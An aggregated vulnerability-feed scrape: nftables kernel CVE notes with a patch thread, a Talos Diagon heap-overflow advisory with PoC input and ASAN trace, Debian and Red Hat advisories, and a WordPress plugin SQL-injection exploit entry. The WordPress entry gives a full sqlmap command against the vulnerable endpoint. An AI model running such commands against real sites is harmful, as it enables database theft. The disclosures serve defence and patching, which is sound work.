Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace

CVE-2023-35001: prevent OOB access in nft_byteorder_eval

Linux Kernel nftables Use-After-Free Local Privilege Escalation Vulnerability; `nft_chain_lookup_byid()` failed to check whether a chain was active and CAP_NET_ADMIN is in any user or network namespace

\* **\[PATCH\] netfilter: nf\_tables: do not ignore genmask when looking up chain by id**
**@ 2023-07-05 12:12 Thadeu Lima de Souza Cascardo**
  2023-07-05 12:16 \` Florian Westphal
  0 siblings, 1 reply; 2+ messages in thread
From: Thadeu Lima de Souza Cascardo @ 2023-07-05 12:12 UTC (permalink / raw)
  To: netfilter-devel; **+Cc:** cascardo, netdev, Pablo Neira Ayuso

When adding a rule to a chain referring to its ID, if that chain had been
deleted on the same batch, the rule might end up referring to a deleted
chain.

This will lead to a WARNING like following:

\[   33.098431\] ------------\[ cut here \]------------
\[   33.098678\] WARNING: CPU: 5 PID: 69 at net/netfilter/nf\_tables\_api.c:2037 nf\_tables\_chain\_destroy+0x23d/0x260
\[   33.099217\] Modules linked in:
\[   33.099388\] CPU: 5 PID: 69 Comm: kworker/5:1 Not tainted 6.4.0+ #409
\[   33.099726\] Workqueue: events nf\_tables\_trans\_destroy\_work
\[   33.100018\] RIP: 0010:nf\_tables\_chain\_destroy+0x23d/0x260
\[   33.100306\] Code: 8b 7c 24 68 e8 64 9c ed fe 4c 89 e7 e8 5c 9c ed fe 48 83 c4 08 5b 41 5c 41 5d 41 5e 41 5f 5d 31 c0 89 c6 89 c7 c3 cc cc cc cc <0f> 0b 48 83 c4 08 5b 41 5c 41 5d 41 5e 41 5f 5d 31 c0 89 c6 89 c7
\[   33.101271\] RSP: 0018:ffffc900004ffc48 EFLAGS: 00010202
\[   33.101546\] RAX: 0000000000000001 RBX: ffff888006fc0a28 RCX: 0000000000000000
\[   33.101920\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
\[   33.102649\] RBP: ffffc900004ffc78 R08: 0000000000000000 R09: 0000000000000000
\[   33.103018\] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8880135ef500
\[   33.103385\] R13: 0000000000000000 R14: dead000000000122 R15: ffff888006fc0a10
\[   33.103762\] FS:  0000000000000000(0000) GS:ffff888024c80000(0000) knlGS:0000000000000000
\[   33.104184\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[   33.104493\] CR2: 00007fe863b56a50 CR3: 00000000124b0001 CR4: 0000000000770ee0
\[   33.104872\] PKRU: 55555554
\[   33.104999\] Call Trace:
\[   33.105113\]  <TASK>
\[   33.105214\]  ? show\_regs+0x72/0x90
\[   33.105371\]  ? \_\_warn+0xa5/0x210
\[   33.105520\]  ? nf\_tables\_chain\_destroy+0x23d/0x260
\[   33.105732\]  ? report\_bug+0x1f2/0x200
\[   33.105902\]  ? handle\_bug+0x46/0x90
\[   33.106546\]  ? exc\_invalid\_op+0x19/0x50
\[   33.106762\]  ? asm\_exc\_invalid\_op+0x1b/0x20
\[   33.106995\]  ? nf\_tables\_chain\_destroy+0x23d/0x260
\[   33.107249\]  ? nf\_tables\_chain\_destroy+0x30/0x260
\[   33.107506\]  nf\_tables\_trans\_destroy\_work+0x669/0x680
\[   33.107782\]  ? mark\_held\_locks+0x28/0xa0
\[   33.107996\]  ? \_\_pfx\_nf\_tables\_trans\_destroy\_work+0x10/0x10
\[   33.108294\]  ? \_raw\_spin\_unlock\_irq+0x28/0x70
\[   33.108538\]  process\_one\_work+0x68c/0xb70
\[   33.108755\]  ? lock\_acquire+0x17f/0x420
\[   33.108977\]  ? \_\_pfx\_process\_one\_work+0x10/0x10
\[   33.109218\]  ? do\_raw\_spin\_lock+0x128/0x1d0
\[   33.109435\]  ? \_raw\_spin\_lock\_irq+0x71/0x80
\[   33.109634\]  worker\_thread+0x2bd/0x700
\[   33.109817\]  ? \_\_pfx\_worker\_thread+0x10/0x10
\[   33.110254\]  kthread+0x18b/0x1d0
\[   33.110410\]  ? \_\_pfx\_kthread+0x10/0x10
\[   33.110581\]  ret\_from\_fork+0x29/0x50
\[   33.110757\]  </TASK>
\[   33.110866\] irq event stamp: 1651
\[   33.111017\] hardirqs last  enabled at (1659): \[<ffffffffa206a209>\] \_\_up\_console\_sem+0x79/0xa0
\[   33.111379\] hardirqs last disabled at (1666): \[<ffffffffa206a1ee>\] \_\_up\_console\_sem+0x5e/0xa0
\[   33.111740\] softirqs last  enabled at (1616): \[<ffffffffa1f5d40e>\] \_\_irq\_exit\_rcu+0x9e/0xe0
\[   33.112094\] softirqs last disabled at (1367): \[<ffffffffa1f5d40e>\] \_\_irq\_exit\_rcu+0x9e/0xe0
\[   33.112453\] ---\[ end trace 0000000000000000 \]---

This is due to the nft\_chain\_lookup\_byid ignoring the genmask. After this
change, adding the new rule will fail as it will not find the chain.

Fixes: 837830a4b439 ("netfilter: nf\_tables: add NFTA\_RULE\_CHAIN\_ID attribute")
Cc: stable@vger.kernel.org
Reported-by: Mingi Cho of Theori working with ZDI
Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
---
 net/netfilter/nf\_tables\_api.c | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/net/netfilter/nf\_tables\_api.c b/net/netfilter/nf\_tables\_api.c
index 9573a8fcad79..3701493e5401 100644
--- a/net/netfilter/nf\_tables\_api.c
+++ b/net/netfilter/nf\_tables\_api.c
@@ -2694,7 +2694,7 @@ static int nf\_tables\_updchain(struct nft\_ctx \*ctx, u8 genmask, u8 policy,
 
 static struct nft\_chain \*nft\_chain\_lookup\_byid(const struct net \*net,
 					       const struct nft\_table \*table,
\-					       const struct nlattr \*nla)
+					       const struct nlattr \*nla, u8 genmask)
 {
 	struct nftables\_pernet \*nft\_net = nft\_pernet(net);
 	u32 id = ntohl(nla\_get\_be32(nla));
@@ -2705,7 +2705,8 @@ static struct nft\_chain \*nft\_chain\_lookup\_byid(const struct net \*net,
 
 		if (trans->msg\_type == NFT\_MSG\_NEWCHAIN &&
 		    chain->table == table &&
\-		    id == nft\_trans\_chain\_id(trans))
+		    id == nft\_trans\_chain\_id(trans) &&
+		    nft\_active\_genmask(chain, genmask))
 			return chain;
 	}
 	return ERR\_PTR(-ENOENT);
@@ -3809,7 +3810,8 @@ static int nf\_tables\_newrule(struct sk\_buff \*skb, const struct nfnl\_info \*info,
 			return -EOPNOTSUPP;
 
 	} else if (nla\[NFTA\_RULE\_CHAIN\_ID\]) {
\-		chain = nft\_chain\_lookup\_byid(net, table, nla\[NFTA\_RULE\_CHAIN\_ID\]);
+		chain = nft\_chain\_lookup\_byid(net, table, nla\[NFTA\_RULE\_CHAIN\_ID\],
+					      genmask);
 		if (IS\_ERR(chain)) {
 			NL\_SET\_BAD\_ATTR(extack, nla\[NFTA\_RULE\_CHAIN\_ID\]);
 			return PTR\_ERR(chain);
@@ -10502,7 +10504,8 @@ static int nft\_verdict\_init(const struct nft\_ctx \*ctx, struct nft\_data \*data,
 						 genmask);
 		} else if (tb\[NFTA\_VERDICT\_CHAIN\_ID\]) {
 			chain = nft\_chain\_lookup\_byid(ctx->net, ctx->table,
\-						      tb\[NFTA\_VERDICT\_CHAIN\_ID\]);
+						      tb\[NFTA\_VERDICT\_CHAIN\_ID\],
+						      genmask);
 			if (IS\_ERR(chain))
 				return PTR\_ERR(chain);
 		} else {
-- 
2.34.1

^ permalink raw reply related	\[**flat**|nested\] 2+ messages in thread

\* **Re: \[PATCH\] netfilter: nf\_tables: do not ignore genmask when looking up chain by id**
  2023-07-05 12:12 \[PATCH\] netfilter: nf\_tables: do not ignore genmask when looking up chain by id Thadeu Lima de Souza Cascardo
**@ 2023-07-05 12:16 \` Florian Westphal**
  0 siblings, 0 replies; 2+ messages in thread
From: Florian Westphal @ 2023-07-05 12:16 UTC (permalink / raw)
  To: Thadeu Lima de Souza Cascardo; **+Cc:** netfilter-devel, netdev, Pablo Neira Ayuso

Thadeu Lima de Souza Cascardo <cascardo@canonical.com> wrote:
\> When adding a rule to a chain referring to its ID, if that chain had been
> deleted on the same batch, the rule might end up referring to a deleted
> chain.
Reviewed-by: Florian Westphal <fw@strlen.de>

^ permalink raw reply	\[**flat**|nested\] 2+ messages in thread

end of thread, other threads:\[~2023-07-05 12:16 UTC | newest\]

**Thread overview:** 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2023-07-05 12:12 \[PATCH\] netfilter: nf\_tables: do not ignore genmask when looking up chain by id Thadeu Lima de Souza Cascardo
2023-07-05 12:16 \` Florian Westphal

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).

CVE-2023-31248: do not ignore genmask when looking up chain by id

A heap-based buffer overflow vulnerability exists in the Sequence::DrawText functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A heap-based buffer overflow vulnerability exists in the Sequence::DrawText functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Diagon v1.0.139

**PRODUCT URLS**

Diagon - https://github.com/ArthurSonzogni/Diagon

**CVSSv3 SCORE**

8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

Diagon is an interpreter that translates markdown in several formats: latex, planar graph, table, tree and many others.

The Diagon interpreter translates a markdown text sequence diagram to a graphical sequence diagram. For instance, the input could look like this:

    Left -> Right: Message1
    Left <- Right: Message2
    

and the sequence diagram would result in:

     ┌────┐  ┌─────┐
     │Left│  │Right│
     └─┬──┘  └──┬──┘
       │        │
       │Message1│
       │───────>│
       │        │
       │Message2│
       │<───────│
     ┌─┴──┐  ┌──┴──┐
     │Left│  │Right│
     └────┘  └─────┘
    

The input will be parsed and will eventually reach the Sequence::UniformizeActors function:

    void Sequence::UniformizeActors() {
      [...]
    
      for (auto& message : messages) {
        for (auto& actor : {message.from, message.to}) {
          if (!actor_index.count(actor)) {
            actor_index[actor] = actors.size();
            Actor a;
            a.name = actor;
            actors.push_back(a);
          }
        }
      }
    }
    

This function will parse the actors in each message in messages, which consist of each row of the sequence diagram text. The actors are the sender and the receiver. In the example above, the actors are “Left” and “Right.” The function populates the actors vector and associates, in the actor_index map, the name of the actor with the number of elements in the actors vector at the creation time of the entry. This essentially can be considered an index starting from 0 and increasing with each new actor.

Eventually the Sequence::LayoutComputeActorsPositions function will be called to calculate the position of the various actors in the sequence diagram:

    void Sequence::LayoutComputeActorsPositions() {
      [...]
      
      for (auto& message : messages) {
        ActorSpace space{actor_index[message.from],  //
                         actor_index[message.to],    //
                         message.width + 1};         //
        if (space.a > space.b)
          std::swap(space.a, space.b);
        spaces.push_back(space);
      }
    
      if (actors.size() != 0)
        actors[0].center = actors[0].name.size() / 2 + 1;
    
      bool modified = true;
      int i = 0;
      while (modified) {
        modified = false;
        for (const ActorSpace& s : spaces) {
          if (actors[s.b].center - actors[s.a].center < s.space) {                                                  [1]
            actors[s.b].center = actors[s.a].center + s.space;
            modified = true;
          }
        }
        if (i++ > 500) {                                                                                            [2]
          std::cout << "Something went wrong!" << std::endl;
          break;
        }
      }
    
      for (auto& actor : actors) {                                                                                  [3]
        actor.left = actor.center - actor.name.size() / 2 - actor.name.size() % 2;
        actor.right = actor.left + actor.name.size() + 2;
      }
    }
    

Then, using the calculated positions, a Screen class is instantiated:

    std::string Sequence::Draw() {
        // Estimate output dimension.
        int width = actors.back().right;
        int height = 0;
        for (const Message& message : messages) {
          height = std::max(height, message.bottom);
        }
        height += 4;
    
        Screen screen(width, height);
    
        for (auto& actor : actors)
          actor.Draw(screen, height);
    
        for (auto message : messages)
          message.Draw(screen);
    
        if (ascii_only_)
          screen.ASCIIfy(0);
        return screen.ToString();
    }
    

The Screen class contains the lines_ matrix where the graphical sequence diagram is going to be written. This matrix takes into consideration the various sizes involved: the actors, the arrows, the messages, etc. Eventually the names of the actors and the messages between the them will be “drawn.” For each of these texts the Screen::DrawText function will be called:

    void Screen::DrawText(int x, int y, std::wstring_view text) {
        for (auto& c : text)
            lines_[y][x++] = c;                                                                                     [4]
    } Here `lines_` is the member of the `Screen` class instantiated in `Sequence::Draw`.
    

Sequence::LayoutComputeActorsPositions uses a variable called spaces. This is a vector dictating the minimum spaces between two actors. The spaces vector contains various instances of the ActorSpace struct. This struct contains two indexes for specifying which actors are involved: the ones stored in the actor_index map, and an integer value that represents the minimum spaces required between the two actors. For each message, one struct is created, using the minimum space required to write the message between the two actors. The spaces vector also contains the spaces required for each pair of adjacent actors. Each actor has three parameters to satisfy this space requirements: left, center and right. These dictate the position of each actor in the diagram.

To simplify the code explanation following, we are going to omit that the spaces array has the distances also for the adjacent actors and consider only the spaces in relationship to the messages and their sender and receiver actors. The Sequence::LayoutComputeActorsPositions function executes a while loop to modifying the actors positions based on the content of spaces. The while is executed until either the condition actors[s.b].center - actors[s.a].center < s.space, at [1], is false, meaning that the space between the two actors is enough for the message to be drawn with no modification of the actors positions, or the while has been executed 500 times, a check is executed at [2], and something was wrong, as suggested by the print.

This function has a bug, which can lead to a heap buffer overflow. Let’s take for example the following representation of a sequence diagram:

      A -> A:Message
    

In this example the sender and the receiver are the same actor, meaning that the index of the two will be equal; in this example, 0. The condition at [1], actors[s.b].center - actors[s.a].center < s.space for this example, can be simplified as actors[0].center - actors[0].center < s.space. Because the portion on the left is always equal to 0, this condition is always true. This means that the actors[s.b].center value is always updated without progress for making the condition at [1] false. Furthermore, also at [3], the actor’s left and right positions are updated, increasing their value.

Eventually the code at [4] is reached. The variable lines_ has a width and a height that are based on the positions calculated for the actors and the messages. The problem is that, even if the while in Sequence::LayoutComputeActorsPositions has been executed 500 times, no progress on changing the position of the actor to accommodate the message has been made. Indeed, the actor’s center, left and right values increased substantially, but the distance between the values did not. In this example the only actor present has the following position values:

      (gdb) p actors
      $19 = std::vector of length 1, capacity 1 = {{
          [...]
          left = 0xfb0,
          center = 0xfb1,
          right = 0xfb3
        }}
    

The left is 1 value from center, which is 2 value away from right. This is due to the calculation made at [3]. The space between left and right should take into consideration the length of the message, but because of the bug just explained it was not possible to account for that. This can lead to a heap buffer overflow vulnerability at [4] writing the message out-of-bounds.

**Exploit Proof of Concept**

Following the content of the POC used:

    $ cat POC.md
    A->A:POC_BOF
    

If we run Diagon compilation with ASAN with the POC:

    $ diagon Sequence < POC.md
    
    Something went wrong!
    =================================================================
    ==256826==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x628000017fd0 at pc 0x000000c77eab bp 0x7fff5f481050 sp 0x7fff5f481048
    WRITE of size 4 at 0x628000017fd0 thread T0
        #0 0xc77eaa in Screen::DrawText(int, int, std::basic_string_view<wchar_t, std::char_traits<wchar_t> >) /home/vagrant/Diagon/src/screen/Screen.cpp:32:20
        #1 0x8a1515 in Message::Draw(Screen&) /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:71:12
        #2 0x8aefb0 in Sequence::Draw[abi:cxx11]() /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:692:13
        #3 0x8acc37 in Sequence::Translate(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:293:10
        #4 0x4fbd0e in (anonymous namespace)::Translate(Translator*, int, char const**) /home/vagrant/Diagon/src/main.cpp:277:36
        #5 0x4f97e7 in main /home/vagrant/Diagon/src/main.cpp:326:12
        #6 0x7f1a7e31ad09 in __libc_start_main csu/../csu/libc-start.c:308:16
        #7 0x44ca69 in _start (/home/vagrant/Diagon/build/diagon-1.0.139+0x44ca69)
    
    0x628000017fd0 is located 0 bytes to the right of 16080-byte region [0x628000014100,0x628000017fd0)
    allocated by thread T0 here:
        #0 0x4f677d in operator new(unsigned long) (/home/vagrant/Diagon/build/diagon-1.0.139+0x4f677d)
        #1 0x7f1a7e655a0e in void std::__cxx11::basic_string<wchar_t, std::char_traits<wchar_t>, std::allocator<wchar_t> >::_M_construct<wchar_t*>(wchar_t*, wchar_t*, std::forward_iterator_tag) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14ba0e)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vagrant/Diagon/src/screen/Screen.cpp:32:20 in Screen::DrawText(int, int, std::basic_string_view<wchar_t, std::char_traits<wchar_t> >)
    Shadow bytes around the buggy address:
      0x0c507fffafa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c507fffaff0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa
      0x0c507fffb000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c507fffb010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c507fffb020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffb030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffb040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==256826==ABORTING
    

We can see that a heap buffer overflow occured at Sequence.cpp:71 that corresponds to the code at [4].

**VENDOR RESPONSE**

The maintainer has provided a patch at: https://github.com/ArthurSonzogni/Diagon/releases/tag/v1.1.158

**TIMELINE**

2023-05-03 - Vendor Disclosure  
2023-05-08 - Vendor Patch Release  
2023-07-05 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-27390: TALOS-2023-1744 || Cisco Talos Intelligence Group

Debian Linux Security Advisory 5446-1 - It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, does not properly handle permission validation for pipe devices, which could result in the execution of arbitrary commands if malformed document files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5446-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJuly 03, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2023-36664It was discovered that Ghostscript, the GPL PostScript/PDF interpreter,does not properly handle permission validation for pipe devices, whichcould result in the execution of arbitrary commands if malformeddocument files are processed.For the oldstable distribution (bullseye), this problem has been fixedin version 9.53.3~dfsg-7+deb11u5.For the stable distribution (bookworm), this problem has been fixed inversion 10.0.0~dfsg-11+deb12u1.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSjKvpfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T5lBAAivkfCmcEfUUjFaT3xhCMNFX5bCHJalKiZ0YpLfLOq6zhveOUoemlI6ValXRmV3kOz7ZdgghXkQ+TxrdcK0GmKy/Mb5Osi4oWU9KcID8Qa/Gu0aEGuz0YCCikyGcaUMlkaZZRtnse5lPOf27avgBDZEkw5vwSXlCEdgleOY/fpX13sKdOrUB5H4Ma79T5RqcLIxMQn/L2YChfjz+3iuY5rfgY50d00g+1r+xomALzQBqYpMFB2iM52gwoBTOQ9nVr2+fuQdfE71ZVHjqOn+xVhJhhKp7fG/uzPz021L1Jec0xvjxh3WGEPfc8kF6sShnoze06l9LfyyVsH629+G0zxcvaK2chku5iJU1zzUh5NQiCMbo6Tdp1c8OxIuuPwdVIRJbMqCDPvz+UJ/KxbnAhN77f/3eb98wTdPWHdW6t5LPdngDxXimHg6RXi2eANVjFOp6XZZ6iju9TvsxPq/MMiBlbD5KPnUK8n6sl8O1b7lHZgy7KU2qFIqWcs482gsrf9ZIMMR4PgNJjp3YQDXjkME/AgUwWKpEx91MKSyc1ygfZYJr7WRnwg81dgTX7hx/GW9fcwprTcGn2H3FmJsnuIYz9wsgLp5x6/WWB1tF7ZGzhYHNgK0QphejDDGTDUTqRcYsiVTkfutBJw2OzDVoIQyrUn78y9Ux1aueF1NM1fMQ==bsYs-----END PGP SIGNATURE-----

Debian Security Advisory 5446-1

A vulnerability was found in quarkus-core. This vulnerability occurs because the TLS protocol configured with quarkus.http.ssl.protocols is not enforced, and the client can force the selection of the weaker supported TLS protocol.

Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-06-29

Updated:

2023-06-29

**RHSA-2023:3809 - Security Advisory**

*   Overview

**Synopsis**

Moderate: Red Hat build of Quarkus 2.13.8 release and security update

**Type/Severity**

Security Advisory: Moderate

**Topic**

An update is now available for Red Hat build of Quarkus. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE links in the References section.

**Description**

This release of Red Hat build of Quarkus 2.13.8 includes security updates, bug  
fixes, and enhancements. For more information, see the release notes page listed in the References section.  

Security Fixes:  

*   CVE-2023-1436 jettison: Uncontrolled Recursion in JSONArray \[quarkus-2\]
*   CVE-2023-26053 gradle: usage of long IDs for PGP keys is unsafe and is subject to collision attacks \[quarkus-2\]
*   CVE-2023-28867 graphql-java: crafted GraphQL query causes stack consumption \[quarkus-2\]
*   CVE-2023-1584 quarkus-oidc: ID and access tokens leak via the authorization code flow \[quarkus-2\]
*   CVE-2023-0482 RESTEasy: creation of insecure temp files \[quarkus-2\]
*   CVE-2022-3782 keycloak: path traversal via double URL encoding \[quarkus-2\]
*   CVE-2023-0481 io.quarkus-quarkus-parent: quarkus: insecure permissions on temp files \[quarkus-2\]
*   CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider \[quarkus-2\]

For more information about the security issues, including the impact, a CVSS  
score, acknowledgments, and other related information, see the CVE links listed in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat Build of Quarkus Text-Only Advisories x86\_64

**Fixes**

*   BZ - 2158916 - CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider
*   BZ - 2163533 - CVE-2023-0481 quarkus: insecure permissions on temp files
*   BZ - 2166004 - CVE-2023-0482 RESTEasy: creation of insecure temp files
*   BZ - 2174854 - CVE-2023-26053 gradle: usage of long IDs for PGP keys is unsafe and is subject to collision attacks
*   BZ - 2180886 - CVE-2023-1584 quarkus-oidc: ID and access tokens leak via the authorization code flow
*   BZ - 2181977 - CVE-2023-28867 graphql-java: crafted GraphQL query causes stack consumption
*   BZ - 2182788 - CVE-2023-1436 jettison: Uncontrolled Recursion in JSONArray
*   BZ - 2211026 - CVE-2023-2974 quarkus-core: TLS protocol configured with quarkus.http.ssl.protocols is not enforced, client can enforce weaker supported TLS protocol
*   QUARKUS-2672 - Infinispan client is not aligned with newly released Red Hat Data Grid 8.4
*   QUARKUS-2787 - Rest Data Panache: Correct Open API integration
*   QUARKUS-2846 - Ensure that new line chars don't break Panache projection
*   QUARKUS-2978 - ExceptionMapper<WebApplicationException> is not working in DEV mode
*   QUARKUS-3158 - Do not create session and PKCE encryption keys if only bearer tokens are expected
*   QUARKUS-3159 - 2.13: Do not support any Origin by default if CORS is enabled
*   QUARKUS-3161 - Fix security-csrf-prevention.adoc
*   QUARKUS-3164 - Logging with Panache: fix LocalVariablesSorter usage
*   QUARKUS-3167 - Make SDKMAN releases minor for maintenance and preview releases
*   QUARKUS-3168 - Backport Ensure that ConfigBuilder classes work in native mode to 2.13
*   QUARKUS-3169 - New home for Narayana LRA coordinator Docker images
*   QUARKUS-3170 - Fix truststore REST Client config when password is not set
*   QUARKUS-3173 - Reinitialize sun.security.pkcs11.P11Util at runtime
*   QUARKUS-3174 - Prevent SSE writing from potentially causing accumulation of headers
*   QUARKUS-3175 - Filter out RESTEasy related warning in ProviderConfigInjectionWarningsTest
*   QUARKUS-3176 - Make sure parent modules are loaded into workspace before those that depend on them
*   QUARKUS-3177 - Fix copy paste error in qute docs
*   QUARKUS-3178 - Pass \`--userns=keep-id\` to podman only when in rootless mode
*   QUARKUS-3179 - Fix stuck HTTP2 request when sent challenge has resumed request
*   QUARKUS-3181 - Make sure quarkus:go-offline properly supports test scoped dependencies
*   QUARKUS-3184 - Use SchemaType.ARRAY instead of "ARRAY" for native support
*   QUARKUS-3185 - Simplify logic in create-app.adoc and allow to define stream
*   QUARKUS-3187 - Allow context propagation for OpenTelemetry
*   QUARKUS-3188 - Fix RestAssured URL handling and unexpected restarts in QuarkusProdModeTest
*   QUARKUS-3191 - Drop ':z' bind option when using MacOS and Podman
*   QUARKUS-3194 - Exclude Netty's reflection configuration files
*   QUARKUS-3195 - Integrate the api dependency from Infinispan 14 (#ISPN-14268)
*   QUARKUS-3205 - Missing JARs and other discrepancies related to xpp3 dependency in 2.13.8.

**CVEs**

*   CVE-2022-45787
*   CVE-2023-0481
*   CVE-2023-0482
*   CVE-2023-1436
*   CVE-2023-1584
*   CVE-2023-2974
*   CVE-2023-26053
*   CVE-2023-28867

**References**

*   https://access.redhat.com/security/updates/classification/#moderate
*   https://access.redhat.com/documentation/en-us/red\_hat\_build\_of\_quarkus/2.13/
*   https://access.redhat.com/articles/4966181

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2023-2974

WordPress WP AutoComplete Search plugin versions 1.0.4 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi# Date: 30/06/2023# Exploit Author: Matin nouriyan (matitanium)# Version: <= 1.0.4# CVE: CVE-2022-4297Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/# Tested on: Kali linux---------------------------------------The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,leading to an unauthenticated SQL injection--------------------------------------How to Reproduce this Vulnerability:1. Install WP AutoComplete <= 1.0.4 2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests3. Find requests belong to WP AutoComplete like step 54. Start sqlmap and exploit 5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q

WordPress WP AutoComplete Search 1.0.4 SQL Injection

POS Codekop version 2.0 suffers from a remote shell upload vulnerability.

